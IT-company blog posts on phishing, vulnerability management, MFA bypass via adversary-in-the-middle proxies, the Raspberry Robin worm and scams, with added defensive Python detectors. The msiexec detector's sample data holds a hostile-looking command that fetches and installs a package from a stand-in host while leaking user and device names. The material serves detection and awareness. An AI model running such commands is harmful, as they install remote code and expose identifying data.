Received a Random Link? DO NOT CLICK ON IT!

If you ever receive a random text or email from PayPal (or any other business, for that matter) telling you that your account has been suspended and that you must authenticate your identity through an unknown link, you should definitely think twice before clicking on that link. This is a common method that hackers use to break into the accounts of people who fall for the phishing scam. There is a better way to investigate the issue and see where it leads: access your account the way you normally would instead of clicking on that link.

If you were in this position, what would you do?

It is pretty safe to say that no one wants to fall for a phishing scam; but, at the same time, it can be very tempting to trust the message to make sure there is nothing wrong with your account.

The best approach is simple, but definitely not one that we would intuitively think to do.

Instead of clicking on the link provided in the text or email, open a new web browser tab and log in to the website the same way you normally would to access your account. It does not matter what type of account you are trying to log into, whether it is your bank, your favorite online retailer, or any other website that you have an account with. Logging into the site directly, rather than using the link given, is simple and easy to do. It will also help keep you from becoming a victim of a phishing attack.

Let Us Help Your Team and Keep Them Safe

4 Corner IT can help you and your company choose the best tools and resources to keep everyone safe from security and phishing attacks. Our professionals can help build your business’ defenses and offer training to all members of your team, including how to identify potential threats and the best practices to keep safe from these attacks. For more information or to get started today, contact us at 954.474.2204.


Enterprise Businesses and Vulnerabilities


It is no secret how vital cybersecurity is for all organizations today. Recent data has shown just how crucial visibility into your company’s infrastructure really is. Today, most businesses have IT solutions to assist with detecting and managing vulnerabilities in their information systems. These vulnerabilities can range from a bug in code that allows hackers to gain access, to a flaw in an update that fixes one vulnerability but causes another. Enterprises face viruses, malware, spam, and phishing schemes. With the number of options available, IT professionals must learn how to manage these vulnerabilities and which types of solutions will best fit the company.

Enterprise Vulnerabilities are Pretty Bad

Sevco Security recently released a report, The State of the Cybersecurity Attack Surface, that gathered data from over 500,000 IT companies. This report found that many of the assets that these businesses relied on were missing critical endpoint protections or lacking critical checkpoints.

Research showed that, of the businesses that were interviewed, 12% lacked endpoint protection services while 5% lacked enterprise patch management. It was also found that 19% of Windows servers were missing endpoint protections.

These companies also had assets that the security control console recognized and registered as having protection installed, even though the device was not checking back in. This is an issue that many organizations deal with: 3% of IT assets showed stale endpoint protections and 1% showed stale patch management. Because these devices are supposedly checked out and approved, issues on them are more difficult to find and resolve before they create problems.
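The difference between a missing agent and a stale one can be measured by correlating two inventories. The following is an added example, not code from the report or from this blog; the device names, dates and the 7-day staleness threshold are constructed assumptions.

```python
from datetime import datetime, timedelta

NOW = datetime(2024, 5, 1)         # fixed clock so the example is reproducible
STALE_AFTER = timedelta(days=7)    # assumed threshold for "not checking back in"

# Constructed data. DIRECTORY: device -> last logon seen by the directory service.
DIRECTORY = {
    "WS-001": datetime(2024, 4, 30), "WS-002": datetime(2024, 4, 29),
    "ws-003": datetime(2024, 4, 30), "SRV-DB1": datetime(2024, 4, 30),
    "WS-OLD": datetime(2023, 11, 2),
}
# CONSOLE: device -> last agent check-in reported by the endpoint protection console.
CONSOLE = {
    "WS-001": datetime(2024, 4, 30), "WS-003": datetime(2024, 3, 12),
    "WS-OLD": datetime(2023, 11, 1),
}

def coverage_gaps(directory, console, now=NOW, stale_after=STALE_AFTER):
    """Split recently active devices into covered, missing and stale."""
    # Sources rarely agree on case, so compare normalized names.
    checkins = {name.upper(): seen for name, seen in console.items()}
    result = {"covered": [], "missing": [], "stale": []}
    for name, last_logon in sorted(directory.items()):
        if now - last_logon > stale_after:
            continue  # device itself is inactive: a cleanup item, not a coverage gap
        checkin = checkins.get(name.upper())
        if checkin is None:
            result["missing"].append(name.upper())   # no agent on record at all
        elif now - checkin > stale_after:
            result["stale"].append(name.upper())     # agent registered but silent
        else:
            result["covered"].append(name.upper())
    return result

def gap_rates(gaps):
    """Percentage of active devices in each bucket."""
    total = sum(len(v) for v in gaps.values())
    return {k: round(100 * len(v) / total, 1) if total else 0.0
            for k, v in gaps.items()}

if __name__ == "__main__":
    gaps = coverage_gaps(DIRECTORY, CONSOLE)
    print(gaps)
    print(gap_rates(gaps))
```

A stale device is the harder case because the console still lists it as protected; only the comparison against a second source of truth exposes it.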

IT professionals should conduct proper research on all the available vulnerability management tools to find the appropriate ones to use. It is essential to look for a tool that allows automated scanning, alerting, and tracking of vulnerabilities over time. The tracking helps ensure that these vulnerabilities are patched as soon as possible. Vulnerability management tools should be pretty easy to set up and begin functioning as soon as possible. 

The four critical criteria of vulnerability management, also known as VM, are network discovery, scanning, reporting and correlation, and asset prioritization. It is important to ensure that you have an IT department that will always maintain your company’s infrastructure. If needed, you can also outsource vulnerability management to another IT team that will assist in protecting your organization’s infrastructure.

We Can Help Prevent Your Business from Experiencing These Issues

At AE Technology Group, our remote monitoring and maintenance services are designed to identify and solve IT problems before they can interrupt business operations. For more information or to find out how we can assist your company, contact us today at (516) 536-5006.


Hackers Are Discovering Cracks in Multi-Factor Authentication

Multi-factor authentication, or MFA, is an effective practice in preventing cyberthreats. Unfortunately, and not surprisingly at all, hackers have found a way around MFA. Continue reading to learn how hackers found defects in multi-factor authentication and how to keep you and your company protected.

Why is Multi-Factor Authentication so effective?

The most common method hackers use to gain access to accounts is phishing, where they convince users to voluntarily provide login information such as usernames and passwords. Less commonly, hackers guess frequently used weak passwords and might be successful. Either way, the secondary credential required by MFA adds another level of security, which helps prevent hackers from accessing accounts and personal information.

How are hackers getting around Multi-Factor Authentication?

Microsoft informed users of recent attacks showing that it is possible for hackers to find ways around multi-factor authentication protocols. Hackers do not necessarily break through MFA, but they are able to bypass inputting the credentials required by MFA.

The most common way of bypassing MFA is through the use of “adversary-in-the-middle” attacks. In this attack, hackers use a phishing scam in tandem with a proxy server between the victim and the service he or she is logging into. Hackers are then able to steal the user’s password and the session cookie. The user is able to gain access to his or her account and has no idea that he or she was just hacked. In reality, the hacker just received access to the user’s account.
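Because the stolen session cookie is later presented by a different client than the one that completed MFA, the service side can look for that change. The following is an added example, not Microsoft's detection or code from this blog; the log format, session IDs and addresses are constructed assumptions.

```python
# Constructed request log: (timestamp, session_id, event, source_ip, user_agent).
CHROME = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0"
FIREFOX = "Mozilla/5.0 (X11; Linux x86_64) Firefox/125.0"
SAMPLE_LOG = [
    ("2024-05-01T09:00:02Z", "s-71c2", "mfa_success", "203.0.113.10", CHROME),
    ("2024-05-01T09:00:05Z", "s-71c2", "request", "203.0.113.10", CHROME),
    ("2024-05-01T09:07:41Z", "s-71c2", "request", "198.51.100.77", FIREFOX),
    ("2024-05-01T09:07:44Z", "s-71c2", "request", "198.51.100.77", FIREFOX),
    ("2024-05-01T09:01:00Z", "s-9a00", "mfa_success", "192.0.2.44", CHROME),
    ("2024-05-01T09:40:00Z", "s-9a00", "request", "192.0.2.45", CHROME),
    ("2024-05-01T09:15:00Z", "s-0f3e", "request", "192.0.2.90", CHROME),
]

def find_session_reuse(log):
    """Flag sessions whose cookie is presented by a client other than the one
    that completed MFA. Each (session, client) pair is reported once."""
    bound = {}     # session_id -> (ip, user_agent) that completed MFA
    seen = set()   # (session_id, ip, user_agent) already reported
    alerts = []
    for ts, sid, event, ip, ua in sorted(log):  # ISO timestamps sort by time
        if event == "mfa_success":
            bound[sid] = (ip, ua)
            continue
        if (sid, ip, ua) in seen:
            continue
        if sid not in bound:
            # The session may predate the log window, so ask for review only.
            severity, reason = "review", "no MFA event on record"
        else:
            mfa_ip, mfa_ua = bound[sid]
            if (ip, ua) == (mfa_ip, mfa_ua):
                continue
            both = ip != mfa_ip and ua != mfa_ua
            # An IP change alone is common (mobile networks, VPNs); a new
            # address together with a new browser is much less so.
            severity = "high" if both else "low"
            reason = "IP and user agent changed" if both else "IP or user agent changed"
        seen.add((sid, ip, ua))
        alerts.append({"time": ts, "session": sid, "ip": ip,
                       "severity": severity, "reason": reason})
    return alerts

if __name__ == "__main__":
    for alert in find_session_reuse(SAMPLE_LOG):
        print(alert)
```

This is a heuristic: it does not fire when the cookie is replayed from the same address and browser string that the proxy used during login.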

Other methods that are used to work around Multi-Factor Authentication

There are other means that hackers use to bypass multi-factor authentication but it may take time and effort. If a particular system uses SMS messages or email codes and the hacker was able to obtain the user’s login credentials, then the hacker can gain access to the account without having to answer the secondary credential.

Hackers can also bypass MFA by using trojans to spy on users or to take control of certain devices used to authenticate a system. If the account’s login portal depends on something the user knows, such as a code, hackers can attempt to get in.

What is the best approach?

The best defense against hackers and other attacks is to educate people on how hackers work and the most appropriate and effective security solutions to incorporate. It is recommended to implement multi-factor authentication. It is also crucial to teach employees the importance of MFA and other security solutions.

AE Technology Group can help you and your organization implement the best security solutions on the market. We can also provide extensive training and testing for your team to be prepared to handle any and all phishing attacks. To learn more about how we can help your business, contact us today at (516) 536-5006.

The Raspberry Robin Worm


Storage devices, such as USB drives, have long been known to spread malware from one device to another. Recent analyses found that an imminent threat, known as the Raspberry Robin worm, is currently developing. What is it and how can you keep yourself and your company safe from attacks?

What is Raspberry Robin?

Raspberry Robin is a worm that was initially discovered in Europe in September 2021 by cybersecurity intelligence analysts at Red Canary. It was found to primarily affect users of Windows operating systems.

What exactly does Raspberry Robin do?

When an infected USB drive is inserted into a computer, the device will display an infected .LNK file. A msiexec process is then started through the command prompt. A .BAT file has two commands that can be executed. One command can manage various Windows features and the other command can configure Open Database Connectivity. The combination of the two will make the threat difficult to locate on the network as it remains hidden.

The Raspberry Robin infection process was found to escalate further where compromised QNAP NAS (Network-Attached Storage) devices are also affected. During this stage, the hacker is able to retrieve the victim’s user and device names, using HTTP requests, once the .LNK file is downloaded. From the infected QNAP device, the malware then utilizes a malicious DLL (Dynamic-Link Library) in order to gain access and take control over the entire system.
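The chain described above (the command prompt starting msiexec, followed by an HTTP request that carries user and device names) can be turned into a process-creation check. The following is an added example, not Red Canary's detection or code from this blog; the event field names, hosts and URLs are constructed assumptions.

```python
import re
from ntpath import basename   # parses Windows paths on any OS

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed process-creation events; field names are assumed, values are samples.
SAMPLE_EVENTS = [
    {"host": "WS-014", "user": "alice",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /q /i http://nas.example.invalid:8080/x/WS-014=alice"},
    {"host": "WS-020", "user": "bob",
     "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Installers\app.msi"},
    {"host": "WS-031", "user": "carol",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /i https://downloads.example.invalid/agent.msi /qn"},
]

def score_event(ev):
    """Return (severity, url) when cmd.exe starts msiexec with a remote URL, else None."""
    if basename(ev["image"]).lower() != "msiexec.exe":
        return None
    if basename(ev["parent_image"]).lower() != "cmd.exe":
        return None
    match = URL_RE.search(ev["cmdline"])
    if match is None:
        return None   # local package: ordinary installer activity
    url = match.group(0)
    # The page says user and device names leave in the HTTP request, so a URL
    # carrying either one is rated higher than a plain remote install.
    leaked = [k for k in ("host", "user") if ev[k].lower() in url.lower()]
    return ("high" if leaked else "medium", url)

def detect(events):
    """Score every event and keep only the suspicious ones."""
    hits = []
    for ev in events:
        scored = score_event(ev)
        if scored:
            hits.append({"host": ev["host"], "severity": scored[0], "url": scored[1]})
    return hits

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

The medium result shows the expected false positive: an administrator script installing a package from a URL looks the same until the host or user name appears in the request.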

How does Raspberry Robin spread?

Although it is understood that Raspberry Robin spreads via compromised USB drives, it’s unclear how it spreads from device to device.

What are hackers looking for?

Unfortunately, as with most malware in its initial stages of development, there is not much known about Raspberry Robin. More research is required to determine its spreadability and the intention hackers may have had when creating this worm. Although it is currently unknown, it is suspected that hackers developed this attack with the intent to steal data and/or install additional viruses on infected devices.

The Final Takeaway

The way to keep yourself and your business safe from Raspberry Robin is to treat all USB devices with intense scrutiny. This includes never inserting USB drives that do not belong to you or USB devices that might have been found lying around on the ground. It is important to remember that a USB drive may not look suspicious from the outside, but inside it can be compromised. Always think twice before plugging any unknown device into your computers.

AE Technology Group can help your organization keep itself protected from the various and growing threats out there, including this Raspberry Robin worm. Although we’re unable to physically stop your team from inserting potentially infected USB devices, we can provide further education, including the dangers of doing so, as well as training for employees. In addition, we will continuously track your network environment for possible threats. To learn more about how we can keep your business safe, please contact us at (516) 536-5006.

Understanding Scams: How to Protect Your Business 

While we try our hardest to ensure there are enough security measures to make it a safe place, the internet can still be a dangerous place. People fall victim to scams every day as scams continue to evolve and become smarter. Scammers can find their way into your email, texts, and ads easily by creating realistic links that you can easily believe are legitimate. Businesses are no strangers to having to deal with costly scams. Why are some people more likely to fall for scams than others, and how do you stop your employees from inadvertently engaging in scams and costing your company?

How Do Scams Continue to Survive?

Online scams are a million-dollar industry that affects individuals and organizations worldwide. As tech advances and the world becomes more connected, scammers continue to adapt, thrive, and succeed in the business of scamming people. Plenty of companies exist with the sole purpose of scamming, and it’s becoming more common as these scams become cheaper and easier to run.

Scammers often operate in countries with few regulations and laws that would prevent them from operating, making it challenging to locate those responsible for the scams. They use many techniques, methods, and types of scams to bypass security and pass as legitimate in a way that tricks everyday people into clicking on their links, answering their phone calls, or responding to emails.

People will likely fall for scams because scammers often target vulnerability and familiarity. It’s a numbers game where they send thousands of emails and only receive a small handful of responses, but it’s just enough. 

When scammers target businesses, they use familiar brands or even the name of someone within your organization to request sensitive information. If an employee is not prepared or educated on the risk of scams, especially if the scammer is friendly and appears legitimate, the employee may ignore the warning signs. They usually end up fulfilling the request, giving the scammer the information they need to complete their scam.

How to Protect Your Business

Thousands of scam emails, texts, and ads make their rounds every day, and it’s becoming more likely that you and your employees will come across a scam at some point in your life. One of the most efficient ways to protect your business from scams is to ensure your employees are educated and informed on what to look for and steps to take if a scam makes its way through network security. Here are some essential tips to help you avoid falling victim to scams.

  • Always remain cautious with every email and text message you receive. If you are suspicious, verify the sender’s identity through other means of communication.
  • Look for some common signs of phishing, including unreasonable demands, suspicious attachments, spelling or grammatical errors, or if you don’t recognize the contact information.
  • Ensure you have security software installed to help filter out scam emails, and always keep your systems and software up to date.
  • Always have a backup of your data in case a scam does make it through. Implement a backup and disaster recovery solution utilizing on-site data storage and off-site data centers.

Get started protecting your business today with a security solution from AE Technology Group. To get started, give us a call at (516) 536-5006.
